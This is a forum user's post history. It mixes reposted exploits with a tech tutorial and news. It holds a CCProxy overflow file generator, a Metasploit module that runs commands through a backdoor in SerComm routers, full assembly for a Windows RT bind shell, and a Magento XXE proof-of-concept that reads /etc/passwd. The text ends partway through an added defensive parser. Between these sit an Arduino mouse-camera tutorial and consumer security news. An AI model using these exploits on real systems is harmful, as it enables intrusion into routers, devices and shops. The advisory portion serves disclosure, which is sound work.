net3design
Everything posted by net3design

  1. CCProxy v7.3 Integer Overflow Exploit

```python
####
# Exploit Title: CCProxy v7.3 Integer Overflow Exploit
# Date: 2013/03/22
# Author: Mr.XHat
# E-Mail: Mr.XHat {AT} GMail.com
# Vendor Homepage: Proxy Software for Windows 7/2008/Vista/XP/2003 - Youngzsoft CCProxy
# Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe
# Version: Prior To 7.3
# Discovered By: Mr.XHat
# Tested On: WinXP SP3 EN
####

hdr = "[System]"
hdr += "\x0d\x0a"
hdr += "Ver=7.3"
hdr += "\x0d\x0a"
hdr += "Language="

# EAX: 0x41414131
buf = "\x41" * 1028
gdt1 = "\x04\xB4\x12\x00"
pad1 = "\x41" * 4
gdt2 = "\xF4\xB3\x12\x00"
pad2 = "\x41" * 12
gdt3 = "\x04\xB4\x12\x00"

sc = (
    # Avoid: '\x00\xff\xf5'
    # [shellcode bytes not reproduced in this listing]
    ""
)

exp = hdr + buf + gdt1 + pad1 + gdt2 + pad2 + gdt3 + sc
file = open("CCProxy.ini", "w")
file.write(exp)
file.close()
```

Source: Exploit DB
  2. SerComm Device Remote Code Execution (Metasploit module)

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStagerEcho

  def initialize(info={})
    super(update_info(info,
      'Name'           => "SerComm Device Remote Code Execution",
      'Description'    => %q{
        This module will cause remote code execution on several SerComm devices.
        These devices typically include routers from NetGear and Linksys. Tested
        against NetGear DG834.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'  # Msf module
        ],
      'Payload'        =>
        {
          'Space'       => 10000, # Could be more, but this should be good enough
          'DisableNops' => true
        },
      'Platform'       => 'linux',
      'Privileged'     => false,
      'Targets'        =>
        [
          ['Linux MIPS Big Endian',    { 'Arch' => ARCH_MIPSBE } ],
          ['Linux MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ],
        ],
      'DefaultTarget'  => 0,
      'References'     =>
        [
          [ 'OSVDB', '101653' ],
          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
        ],
      'DisclosureDate' => "Dec 31 2013"
    ))

    register_options(
      [
        Opt::RPORT(32764)
      ], self.class)
  end

  def check
    fprint = endian_fingerprint
    case fprint
    when 'BE'
      print_status("Detected Big Endian")
      return Msf::Exploit::CheckCode::Vulnerable
    when 'LE'
      print_status("Detected Little Endian")
      return Msf::Exploit::CheckCode::Vulnerable
    end

    return Msf::Exploit::CheckCode::Unknown
  end

  def exploit
    execute_cmdstager(:noargs => true)
  end

  def endian_fingerprint
    begin
      connect
      sock.put(rand_text(5))
      res = sock.get_once
      disconnect

      if res && res.start_with?("MMcS")
        return 'BE'
      elsif res && res.start_with?("ScMM")
        return 'LE'
      end
    rescue Rex::ConnectionError => e
      print_error("Connection failed: #{e.class}: #{e}")
    end

    return nil
  end

  def execute_command(cmd, opts)
    vprint_debug(cmd)

    # Get the length of the command, for the backdoor's command injection
    cmd_length = cmd.length

    # 0x53634d4d => Backdoor code
    # 0x07       => Exec command
    # cmd_length => Length of command to execute, sent after communication struct
    data = [0x53634d4d, 0x07, cmd_length].pack("VVV")

    connect
    # Send command structure followed by command text
    sock.put(data + cmd)
    disconnect
    Rex.sleep(1)
  end
end
```

Source: Exploit-DB, Rapid7
  3. An optical mouse uses a small camera that records the surface to calculate the movements of the mouse. In this tutorial I will show you how to display the video signal of this camera in your browser. The mouse I took apart was an old Logitech RX 250 which contains an ADNS-5020 optical sensor. This sensor records 15x15 pixel images in grayscale. It also calculates the X-Y movements of the mouse.

To get things running you will need:
- arduino
- ethernet shield
- optical mouse with ADNS-5020 sensor
- 10K ohm resistor

Connect everything together

Make sure that the pins (NRESET, NCS, SDIO, SCLK) of the sensor don't connect to anything on the mouse board. If they do, cut the traces. (I removed the main chip and some resistors to achieve the same thing.) Solder a 10K ohm resistor between NRESET and +5V. Then solder wires (approx. 20cm) to the pins NCS, SDIO, SCLK, +5V, GND. This is the scheme you should end up with:

Put the Ethernet shield on the arduino and connect it to the local network. Then connect the mouse sensor to the arduino like this:

    +5V  -------------- Arduino +5V
    GND  -------------- Arduino GND
    NCS  -------------- Arduino digital pin 7
    SDIO -------------- Arduino digital pin 6
    SCLK -------------- Arduino digital pin 5

Arduino sketch

In the sketch below replace the receiverIP value (in my case 192, 168, 1, 102) with the IP of your computer. Then upload the sketch to the arduino.

```cpp
#include <SPI.h>
#include <Ethernet.h>
#include <EthernetUdp.h>

byte arduinoMac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED };
IPAddress arduinoIP(192, 168, 1, 177);   // desired IP for Arduino
unsigned int arduinoPort = 8888;         // port of Arduino
IPAddress receiverIP(192, 168, 1, 102);  // IP of udp packets receiver
unsigned int receiverPort = 6000;        // port to listen on my PC

EthernetUDP Udp;

int SCLK = 5;
int SDIO = 6;
int NCS = 7;

void setup() {
  Serial.begin(9600);
  Ethernet.begin(arduinoMac, arduinoIP);
  Udp.begin(arduinoPort);

  pinMode(SCLK, OUTPUT);
  pinMode(SDIO, OUTPUT);
  pinMode(NCS, OUTPUT);

  mouse_reset();
  delay(10);
}

void loop() {
  char img[225];  // one 15x15 frame, one byte per pixel
  for (int i = 0; i < 225; i++) {
    img[i] = readLoc(0x0b);  // read the next pixel from the pixel grab register
    img[i] &= 0x7F;
    img[i] += 1;  // a 0 byte would terminate a string-based write, so never send 0
    Serial.print(img[i], DEC);
    Serial.print(",");
    delay(2);
  }
  Serial.println();

  Udp.beginPacket(receiverIP, receiverPort);     // start udp packet
  Udp.write((const uint8_t*)img, sizeof(img));   // write the whole frame, not a C string
  Udp.endPacket();                               // end packet
  delay(500);
}

void mouse_reset() {
  // Initiate chip reset
  digitalWrite(NCS, LOW);
  pushbyte(0x3a);
  pushbyte(0x5a);
  digitalWrite(NCS, HIGH);
  delay(10);

  // Set 1000cpi resolution
  digitalWrite(NCS, LOW);
  pushbyte(0x0d);
  pushbyte(0x01);
  digitalWrite(NCS, HIGH);
}

unsigned int readLoc(uint8_t addr) {
  unsigned int ret = 0;
  digitalWrite(NCS, LOW);
  pushbyte(addr);
  ret = pullbyte();
  digitalWrite(NCS, HIGH);
  return ret;
}

// Clock one byte out to the sensor, MSB first
void pushbyte(uint8_t c) {
  pinMode(SDIO, OUTPUT);
  for (unsigned int i = 0x80; i; i = i >> 1) {
    digitalWrite(SCLK, LOW);
    digitalWrite(SDIO, c & i);
    digitalWrite(SCLK, HIGH);
  }
}

// Clock one byte in from the sensor, MSB first
unsigned int pullbyte() {
  unsigned int ret = 0;
  pinMode(SDIO, INPUT);
  for (unsigned int i = 0x80; i > 0; i >>= 1) {
    digitalWrite(SCLK, LOW);
    ret |= i * digitalRead(SDIO);
    digitalWrite(SCLK, HIGH);
  }
  pinMode(SDIO, OUTPUT);
  return ret;
}
```

Open the serial window and you should see data flowing from the mouse:

Install Node.js and Socket.IO

To display the data in a browser we need to have node.js and socket.io installed on the computer. Install node.js from nodejs.org, then go to the windows command prompt and run:

    npm install socket.io

Node.js and website code

In the code below we configure node.js to listen to udp traffic from the arduino, send all data to the browser with socket.io and set up a basic web server.

```javascript
var dgram = require("dgram");
var server = dgram.createSocket("udp4");
var io = require('socket.io').listen(8000); // server listens for socket.io communication at port 8000
io.set('log level', 1); // disables debugging. this is optional. you may remove it if desired.

server.on("message", function (msg, rinfo) {
  // every time new data arrives do this:
  //console.log("server got: " + msg + " from " + rinfo.address + ":" + rinfo.port);
  //console.log("server got:" + msg);
  io.sockets.emit('message', msg);
});

server.on("listening", function () {
  var address = server.address();
  console.log("server listening " + address.address + ":" + address.port);
});

server.bind(6000); // listen to udp traffic on port 6000

var http = require("http"),
    url = require("url"),
    path = require("path"),
    fs = require("fs"),
    port = process.argv[2] || 8888;

http.createServer(function(request, response) {
  var uri = url.parse(request.url).pathname,
      filename = path.join(process.cwd(), uri);
  var contentTypesByExtension = {
    '.html': "text/html",
    '.css':  "text/css",
    '.js':   "text/javascript"
  };

  fs.exists(filename, function(exists) {
    if (!exists) {
      response.writeHead(404, {"Content-Type": "text/plain"});
      response.write("404 Not Found\n");
      response.end();
      return;
    }

    if (fs.statSync(filename).isDirectory()) filename += '/index.html';

    fs.readFile(filename, "binary", function(err, file) {
      if (err) {
        // a read error must not fall through to writing an undefined body
        response.writeHead(500, {"Content-Type": "text/plain"});
        response.write(err + "\n");
        response.end();
        return;
      }
      var headers = {};
      var contentType = contentTypesByExtension[path.extname(filename)];
      if (contentType) headers["Content-Type"] = contentType;
      response.writeHead(200, headers);
      response.write(file, "binary");
      response.end();
    });
  });
}).listen(parseInt(port, 10));

console.log("Static file server running at\n => http://localhost:" + port + "/\nCTRL + C to shutdown");
```

Just save the code as code.js

Now we need to create a website which will convert the data from socket.io into a 15x15 image. This is it:

```html
<html>
<head>
<style>
  #wrapper { width:300px; height:300px; }
  div div { width:20px; height:20px; float:left; }
</style>
<script type="text/javascript" src="//localhost:8000/socket.io/socket.io.js"></script>
<script>
  var socket = io.connect('http://localhost:8000');
  socket.on('connect', function () {
    socket.on('message', function (msg) {
      document.getElementById('wrapper').innerHTML = '';
      for (var i = 0; i < 225; i++) {
        pixDraw(Math.round((msg[i]) * 2.4));
      }
    });
  });

  function pixDraw(clr) {
    var pixDiv = document.createElement('div');
    pixDiv.style.backgroundColor = "rgb(" + clr + "," + clr + "," + clr + ")";
    document.getElementById("wrapper").appendChild(pixDiv);
  }
</script>
</head>
<body>
  <div id="wrapper"></div>
</body>
</html>
```

Save it as index.html

Run it!

If you are on windows then just download the zip file below and run the runme.bat file. If you are on linux then run the command node code.js in the shell. Now open the address http://localhost:8888/ in a web browser and you should see a realtime image from the mouse:

Source: Hack a Mouse
  4. How to block tagging in photos or posts on Facebook. Control who tags you and when. It is not pleasant at all to be tagged at any time and by anyone in photos or posts. If this happens because of a spam/virus of this kind, things are even more unpleasant. Many do not know that they can control who tags them on Facebook and when, and that they can review and approve these "tags" as appropriate before they appear on their profile. Here is how to proceed. Go to the "Privacy settings" section of your account settings and then to "Timeline and Tagging Settings". You can go there directly: https://www.facebook.com/settings?tab=timeline. Here you have two changes to make: 1. Click the "Edit" button next to "Review posts friends tag you in before they appear on your timeline?" and select "Enabled". 2. Click the "Edit" button next to "Review tags people add to your own posts before the tags appear on Facebook?" and choose "Enabled". Source: Faravirusi.com
  5. VIDEO ING Bank wants to make you give up cards and keep your money on your smartphone. ING Bank launched ING Pay on Tuesday, a payment solution using the smartphone and Visa contactless technology, which allows fast payments at the POS. The launch of the new service is part of ING Bank's strategic orientation towards the digital environment and is in line with the accelerated growth in smartphone adoption and use in Romania. The ING Pay solution consists of a native application available on Google Play or the App Store and a microSD card incorporating NFC technology, operated by VISA. One disadvantage of this new payment system is that the user will have to give up the extra storage space offered by ordinary microSD cards. For iPhone users, a smartphone that has no microSD card slot, the system includes a special case that connects to the phone. ING Pay can be personalised according to each user's preferences and replaces cash or the card at merchants, allowing fast payments in just a few seconds. For speed, users can choose to enter the PIN only for payments above 100 RON, in which case the transaction is still completed contactless. The application also offers the option of using the PIN code for all transactions, regardless of their value. "With the launch of the ING Pay service and contactless cards, ING takes another step towards the future, offering its customers innovative and easy-to-use payment solutions. With ING Pay, ING's orientation towards e-banking services crosses the barrier of the internet on PC/laptop/tablet and heads towards the mobile market, a market on an upward trend in recent years," said Maria Cristina Matei, Head of ING Retail Banking. Contactless payments with the phone can be made in Romania and abroad, wherever the VISA PayWave logo appears at the checkout (supermarkets, petrol stations, restaurants, cinemas, pharmacies etc.). ING Pay is available for the following phones (with an internet connection): iPhone 4, iPhone 4S, Samsung Galaxy S (I9000), Samsung Galaxy S Plus (I9001), Samsung Galaxy S II (I9100), Samsung Galaxy S II Plus (I9105), Samsung Galaxy S III (I9300), Samsung Galaxy S4 (I9505), Samsung Galaxy Note II (N7100). ING representatives say that, in principle, the system would also be compatible with other Android smartphones, provided they have a microSD card slot. ING Pay was launched as a result of the collaboration between ING Bank, VISA Europe and Oberthur Technologies Romania. This new service continues the series of ING Bank innovations in payments. In the first half of 2013, ING Bank launched Visa and Mastercard contactless cards which, in addition to the usual functions of a debit card, allow payments simply by passing the card in front of the contactless POS terminal. Contactless payments thus shorten waiting times and speed up transactions at merchants. To understand how we spend, save, invest and how quickly we adapt to new trends such as mobile banking services, ING Bank published the results of its latest IIS study, "Financial Empowerment in the Digital Age", which provides relevant information on the mobile banking market, contactless technology and how users relate to online payment methods. According to the study, 37% of Europeans use mobile banking and manage their money on the go, and 62% of them pay their bills on time more often thanks to this service. Among European countries, the Netherlands has the largest number of mobile banking users. Turkey is the next hotspot for these services, and Poles are the ones who most often use mobile banking for shopping. There are several reasons why some Europeans have not yet turned to mobile banking: not having a smartphone or tablet (37%), concerns about the security of these solutions (33%) or the belief that mobile banking services offer nothing they cannot get through traditional ways of interacting with the bank (11%). As for the results for Romania, over 32% of the Romanian internet users surveyed answered that they use mobile banking services, which means that adoption of this service in Romania is close to that of countries such as France (25%) or Belgium (26%). Source: Adevarul IT news
  6. Windows RT ARM Bind Shell (Port 4444)

```asm
; Title: Windows RT ARM Bind Shell (Port 4444)
; Date: July 28, 2013
; Author: Matthew Graeber (@mattifestation)
; Blog post: Exploit Monday: Windows RT ARMv7-based Shellcode Development
; Tested on: Microsoft Surface RT Tablet w/ Windows RT (6.2.9200)
; License: BSD 3-Clause
; Syntax: MASM
; Notes: In order for this to work properly, you have to call this payload
;        at baseaddress + 1 since it is thumb code.
;        This was built with armasm.exe from Visual Studio 2012

    AREA |.foo|, CODE, THUMB    ; After linking, the resulting executable will only
                                ; have a single section (with RX permissions) named .foo
    EXPORT main

main
    push {r4,lr}                ; Preserve registers on the stack
    bl ExecutePayload           ; Execute bind shell function
    pop {r4,pc}                 ; Restore registers on the stack and return to caller

GetProcAddress
    ; ARM (Thumb) implementation of the logic from the Metasploit x86 block_api shellcode
    push {r1-r11,lr}            ; Preserve registers on the stack
    mov r9,r0                   ; Save the function hash in R9
    mrc p15,#0,r3,c13,c0,#2     ; R3 = &TEB
    ldr r3,[r3,#0x30]           ; R3 = &PEB
    ldr r3,[r3,#0xC]            ; R3 = PEB->Ldr
    movs r6,#0                  ; R6 = 0
    ldr r1,[r3,#0xC]            ; R1 = Ldr->InLoadOrderModuleList
    ldr r4,[r1,#0x18]           ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
    ldr r3,[r1,#0x2C]           ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
    ldr r7,[r1,#0x30]           ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
    str r3,[sp]                 ; Store BaseDllName.Length/MaximumLength on the stack
    cbz r4,exit_failure         ; If DllBase == 0, you've likely reached the end of the module list. Return 0.
    mov r10,#0xD                ; R10 = ROR value (13)
    mov r11,#0xD                ; R11 = ROR value (13)

get_module_hash
    ; Improvement: Need to validate MaximumLength != 0
    ldrh r5,[sp,#2]             ; BaseDllName.MaximumLength
    movs r2,#0                  ; i = 0
    cbz r5,get_export_dir       ; Reached the last char of BaseDllName

ror_module_char
    ldrsb r3,[r7,r2]            ; R3 = (CHAR) *((PCSTR) BaseDllName.Buffer + i)
    rors r0,r6,r10              ; Calculate the next portion of the module hash
    cmp r3,#0x61                ; Is the character lower case?
    blt notlowercase
    adds r3,r3,r0               ; Add to the running hash value
    subs r6,r3,#0x20            ; Convert character to upper case
    b get_next_char

notlowercase
    adds r6,r3,r0               ; Add to the running hash value

get_next_char
    adds r2,#1                  ; Move to the next character
    cmp r2,r5                   ; Reached the last character in the module name?
    bcc ror_module_char         ; If not, move on to the next character

get_export_dir
    ; At this point, the module hash has been calculated.
    ; Now begin calculating the function hash
    ldr r3,[r4,#0x3C]           ; IMAGE_DOS_HEADER.e_lfanew - i.e. offset to PE IMAGE_NT_HEADERS
    adds r3,r3,r4               ; PIMAGE_NT_HEADERS
    ldr r3,[r3,#0x78]           ; IMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress (only an RVA at this point)
    cbz r3,get_next_module      ; Move to the next module if it doesn't have an export directory (i.e. most exe files)
    adds r5,r3,r4               ; Calculate export dir virtual address
    ldr r3,[r5,#0x20]           ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNames
    ldr r7,[r5,#0x18]           ; R7 = PIMAGE_EXPORT_DIRECTORY->NumberOfNames
    movs r0,#0
    adds r8,r3,r4               ; AddressOfNames VA
    cbz r7,get_next_module      ; Move on to the next module if there are no exported names

calc_func_hash
    ldr r3,[r8],#4              ; R3 = Current name RVA
    movs r2,#0
    adds lr,r3,r4               ; lr = Current name VA

get_func_char
    ldrsb r3,[lr]               ; Load char from the function name
    rors r2,r2,r11              ; Calculate the next portion of the function hash
    adds r2,r2,r3               ; Add to the running hash value
    ldrsb r3,[lr],#1            ; Peek at the next char
    cmp r3,#0                   ; Are you at the end of the function string?
    bne get_func_char           ; If not, calculate hash for the next char.
    adds r3,r2,r6               ; Add the module hash to the function hash
    cmp r3,r9                   ; Does the calculated hash match the hash provided?
    beq get_func_addr
    adds r0,#1
    cmp r0,r7                   ; Are there more functions to process?
    bcc calc_func_hash

get_next_module
    ldr r1,[r1]                 ; LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink
    movs r6,#0                  ; Clear the function hash
    ; Improvement: The following portion is redundant
    ldr r4,[r1,#0x18]           ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
    ldr r3,[r1,#0x2C]           ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
    ldr r7,[r1,#0x30]           ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
    cmp r4,#0                   ; DllBase == 0?
    str r3,[sp]                 ; Store BaseDllName.Length/MaximumLength on the stack
    bne get_module_hash

exit_failure
    movs r0,#0                  ; Return 0 upon failure to find a matching hash

exit_success
    pop {r1-r11,pc}             ; Restore stack and return to caller with the function address in R0

get_func_addr
    ldr r3,[r5,#0x24]           ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
    add r3,r3,r0,lsl #1
    ldrh r2,[r3,r4]             ; R2 = Ordinal table index
    ldr r3,[r5,#0x1C]           ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
    add r3,r3,r2,lsl #2
    ldr r3,[r3,r4]              ; Function RVA
    adds r0,r3,r4               ; R0 = Function VA
    b exit_success

ExecutePayload
    ; Improvement: None of the calls to GetProcAddress
    ; validate that a valid address was actually returned
    ; Metasploit shellcode doesn't perform this validation either.
    push {r4-r11,lr}            ; Preserve registers on the stack
    subw sp,sp,#0x214           ; Allocate space on the stack for local variables
    movs r3,#0x44               ; sizeof(_PROCESS_INFORMATION)
    add r2,sp,#0x38             ; R2 = &StartupInfo
    movs r1,#0

init_mem1
    ; Improvement: I could just initialize everything on the stack to 0
    strb r1,[r2],#1             ; Set current byte to 0
    subs r3,#1
    bne init_mem1
    movs r3,#0x10               ; sizeof(_STARTUPINFOW)
    add r2,sp,#0x28             ; R2 = &ProcessInformation

init_mem2
    strb r1,[r2],#1             ; Set current byte to 0
    subs r3,#1
    bne init_mem2

    ldr r0,HASH_LoadLibraryA
    bl GetProcAddress
    mov r3,r0
    adr r0,module_name          ; &"ws2_32.dll"
    blx r3                      ; LoadLibrary("ws2_32.dll");
    ldr r0,HASH_WsaStartup
    bl GetProcAddress
    mov r4,r0
    ldr r0,HASH_WsaSocketA
    bl GetProcAddress
    mov r5,r0
    ldr r0,HASH_Bind
    bl GetProcAddress
    mov r6,r0
    ldr r0,HASH_Listen
    bl GetProcAddress
    mov r7,r0
    ldr r0,HASH_Accept
    bl GetProcAddress
    mov r8,r0
    ldr r0,HASH_CloseSocket
    bl GetProcAddress
    mov r9,r0
    ldr r0,HASH_CreateProcess
    bl GetProcAddress
    mov r10,r0
    ldr r0,HASH_WaitForSingleObject
    bl GetProcAddress
    mov r11,r0

    mov r0,#0x0202
    add r1,sp,#0x80
    blx r4                      ; WSAStartup(MAKEWORD(2, 2), &WSAData);
    movs r3,#0
    movs r2,#0
    movs r1,#1
    movs r0,#2
    str r3,[sp,#4]
    str r3,[sp]
    blx r5                      ; s = WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
    movs r3,#2                  ; service.sin_family = AF_INET;
    strh r3,[sp,#0x18]
    movs r3,#0                  ; service.sin_addr.s_addr = 0;
    str r3,[sp,#0x1C]
    mov r3,#0x5C11              ; service.sin_port = HTONS(4444);
    movs r2,#0x10
    add r1,sp,#0x18
    strh r3,[sp,#0x1A]
    mov r5,r0                   ; WSASocketA returned socket (s)
    blx r6                      ; Bind( s, (SOCKADDR *) &service, sizeof(service) );
    movs r1,#0
    mov r0,r5
    blx r7                      ; Listen( s, 0 );
    movs r2,#0
    movs r1,#0
    mov r0,r5
    blx r8                      ; AcceptedSocket = Accept( s, 0, 0 );
    mov r4,r0
    mov r0,r5
    blx r9                      ; CloseSocket( s ); Close the original socket
    mov r3,#0x101               ; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    str r3,[sp,#0x64]
    movs r3,#0x44               ; StartupInfo.cb = 68;
    str r3,[sp,#0x38]
    add r3,sp,#0x28
    str r3,[sp,#0x14]
    add r3,sp,#0x38
    str r3,[sp,#0x10]
    movs r3,#0
    str r3,[sp,#0xC]
    str r3,[sp,#8]
    str r3,[sp,#4]
    movs r3,#1
    adr r1,cmdline              ; &"cmd"
    str r3,[sp]
    movs r3,#0
    movs r2,#0
    movs r0,#0
    str r4,[sp,#0x78]           ; StartupInfo.hStdError = (HANDLE) AcceptedSocket;
    str r4,[sp,#0x74]           ; StartupInfo.hStdOutput = (HANDLE) AcceptedSocket;
    str r4,[sp,#0x70]           ; StartupInfo.hStdInput = (HANDLE) AcceptedSocket;
    blx r10                     ; CreateProcessA( 0, "cmd", 0, 0, TRUE, 0, 0, 0, &StartupInfo, &ProcessInformation );
    ldr r0,[sp,#0x28]
    mvn r1,#0
    blx r11                     ; WaitForSingleObject( ProcessInformation.hProcess, INFINITE );
    addw sp,sp,#0x214
    pop {r4-r11,pc}

HASH_WaitForSingleObject DCD 0x601d8708
HASH_CreateProcess       DCD 0x863fcc79
HASH_CloseSocket         DCD 0x614d6e75
HASH_Accept              DCD 0xe13bec74
HASH_Listen              DCD 0xff38e9b7
HASH_Bind                DCD 0x6737dbc2
HASH_WsaSocketA          DCD 0xe0df0fea
HASH_WsaStartup          DCD 0x006b8029
HASH_LoadLibraryA        DCD 0x0726774c
cmdline                  DCB "cmd", 0x0
module_name              DCB "ws2_32.dll", 0x0

    END
```

Source: Exploit DB 27180 Windows RT
  7. You have been quite good to the forum members. Thank you for the accounts ...
  8. A Facebook account, public or private, defines its owner professionally, personally and socially, and protecting identity and confidentiality should be one of the most important priorities. Still, few people take steps to secure their account. With the arrival of Facebook Mobile we can have Facebook everywhere, but we have also become more vulnerable to account break-ins or identity theft. Mashable has put together a list of five things that can be done to increase the protection of phones and of social network accounts. 1. Set a password. Over 30% of smartphone users do not protect their phones with a password or a pattern. This should be the first line of defence if the phone is lost or stolen. If you have an iPhone that already has a passcode but you want a more complex one, go to General Settings, Passcode Lock, and turn off the Simple Passcode option, which limits the passcode to 4 digits, so that a longer code can be used. Some phones also have the option of wiping stored data after a number of failed attempts to enter the password. 2. Use a different password for email and for the Facebook account. Three quarters of users use a single password for all their accounts. A few extra digits or letters in a password can drastically increase the time needed to crack it. 3. Make sure Secure Browsing is enabled. Since 2011 Facebook has offered a secure browsing option. Without a secure HTTP connection, your information is vulnerable to attacks every time you use free Wi-Fi, such as that offered at Starbucks or other fast-food places. 4. Enable login notifications and login approvals. To make sure your Facebook account is used only when and where you want, enable this option and Facebook will send a notification every time your account is accessed from a new location (you will need to provide a phone number so that text notifications can be sent). If someone breaks into your account, you will receive instructions for resetting the password and securing the account. Login approvals will require a special code every time you access the account from a new device. 5. Use "Trusted Contacts". Facebook's recent innovation asks you to select a small group of trusted friends. If you cannot access your account and the security questions do not help either, Facebook will send different codes to those friends. By putting the codes together, you will be able to log in to Facebook. Source: Cinci ponturi pentru a spori securitatea telefonului și a contului de Facebook | Ziarul Financiar
  9. Restricting the launch of third-party applications protects the security of computers and increases employee efficiency. However, 57% of companies still do not use application control tools, according to a study carried out by Kaspersky Lab in partnership with B2B International in November 2012. Cybercriminals use numerous tricks to infect IT systems. One such example is distributing malware files disguised as popular applications, so that when an employee tries to start an application the entire infrastructure is compromised. To prevent such incidents, companies must develop and enforce security policies on installing and launching applications, but not all of them do so. According to the study, most companies do not control downloaded applications in any way, and 17% of firms do not plan to use new application control technologies or are not even aware that they exist. The situation is similar for the use of external devices and other data media: only 44% of companies pay sufficient attention to this problem and implement device control tools, while 17% of companies are not aware that device control tools exist or are not interested in using them. Source: Circa 60% dintre companii nu controleaza aplicatiile utilizate de catre angajati
  10. SEC Consult Vulnerability Lab Security Advisory < 20120712-0 >
=======================================================================
title: Local file disclosure via XXE injection
product: Magento eCommerce Platform Enterprise & Community Edition
vulnerable version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.1
                    Magento eCommerce Platform Community Edition <= v1.7.0.1
fixed version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.2
               Magento eCommerce Platform Community Edition <= v1.7.0.2
impact: Critical
homepage: Ecommerce Software & Ecommerce Platform Solutions | Magento
found: 2012-06-18
by: K. Gudinavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Magento eCommerce Platforms provide the scalability, flexibility and features for business growth. Magento provides feature-rich eCommerce platforms that offer merchants complete flexibility and control over the presentation, content, and functionality of their online channel."

Source: Online Shopping Cart Software | Magento

Vulnerability overview/description:
-----------------------------------
Magento eCommerce platform uses a vulnerable version of Zend framework which is prone to XML eXternal Entity Injection attacks. The SimpleXMLElement class of Zend framework (SimpleXML PHP extension) is used in an insecure way to parse XML data. External entities can be specified by adding a specific DOCTYPE element to XML-RPC requests. By exploiting this vulnerability an application may be coerced to open arbitrary files and/or TCP connections.

Proof of concept:
-----------------
Magento uses a vulnerable Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php) to handle XML-RPC requests. Hence it is possible to disclose arbitrary local files from the remote system.

The following HTTP POST request to the vulnerable XmlRpc server application illustrates the exploitation of this vulnerability:

POST /index.php/api/xmlrpc HTTP/1.1
Host: $host

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>

Vulnerable / tested versions:
-----------------------------
Magento eCommerce Platform Enterprise Edition v1.10.1.1
Magento eCommerce Platform Community Edition v1.7.0.0 & v1.7.0.1

Earlier versions are probably affected too!

Vendor contact timeline:
------------------------
2012-06-18: Contacting vendor through the contact form on the webpage as no email addresses or security contacts are to be found (Magento - Contact Us - eCommerce Software for Growth)
2012-06-20: No reply so far, hence trying again by choosing a different contact reason.
2012-06-21: Creating a bug tracking entry, asking for security contact (Magento - Report a Bug - eCommerce Software for Growth).
2012-06-21: Vendor reply: security@magento.com should be used.
2012-06-22: Sending advisory draft.
2012-06-22: Vendor reply: Testing workaround for customers to disable XMLRPC functionality, patch in progress; vendor will improve website to provide a clearer, more direct method for researchers.
2012-06-25: Asking for affected versions and release timeline.
2012-06-26: Informing Magento about Zend framework advisory.
2012-06-27: Vendor: sending more information to SEC Consult soon.
2012-07-04: Asking vendor about status.
2012-07-05: Vendor releases new versions and patches.
2012-07-12: SEC Consult releases detailed advisory.

Solution:
---------
Magento Community Edition
* 1.7.0.0+ - Upgrade to the latest version, currently v1.7.0.2: Open Source Ecommerce Software & Solutions | Magento
* 1.4.0.0 - 1.4.1.1 - Apply the patch http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.0.0-1.4.1.1.patch
* 1.4.2.0 - Apply the patch http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.2.0.patch
* 1.5.0.0 - 1.7.0.1 - Apply the patch http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.5.0.0-1.7.0.1.patch

Magento Enterprise Edition
* 1.12.0.0+ - Upgrade to the latest version, currently v1.12.0.2: https://www.magentocommerce.com/products/customer/account/index/
* 1.8.0.0 - 1.11.X.X - Apply the Zend Security Upgrades patch https://www.magentocommerce.com/products/customer/account/index/

Magento Professional Edition
* All versions - Apply the Zend Security Upgrades patch https://www.magentocommerce.com/products/customer/account/index/

More information can be found at: Magento - Blog - Update: Zend Framework Vulnerability Security Update - eCommerce Software for Growth

Workaround:
-----------
Detailed steps can be found at: Magento - Blog - Update: Zend Framework Vulnerability Security Update - eCommerce Software for Growth
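An added example (not SEC Consult's, Zend's or Magento's code) of the parser-side check that closes the hole the advisory describes: the XML-RPC wire format never needs a DTD, so refusing any DOCTYPE up front means the external entity is never resolved. It is Python using only the standard library; the benign request and the external-DTD variant are constructed samples, while the XXE body is the advisory's own PoC.

```python
"""Rejecting DTDs in XML-RPC requests to stop XXE.

Added example, not Zend or Magento code. An XML-RPC <methodCall> never needs
a DOCTYPE, so the parser below refuses one before any entity can be declared,
let alone resolved. Standard-library expat only.
"""
import xml.parsers.expat as expat

# Scalar XML-RPC value types whose text is collected as a parameter.
SCALAR_TYPES = {"string", "int", "i4", "boolean", "double",
                "dateTime.iso8601", "base64"}


class UnsafeXmlRpcRequest(ValueError):
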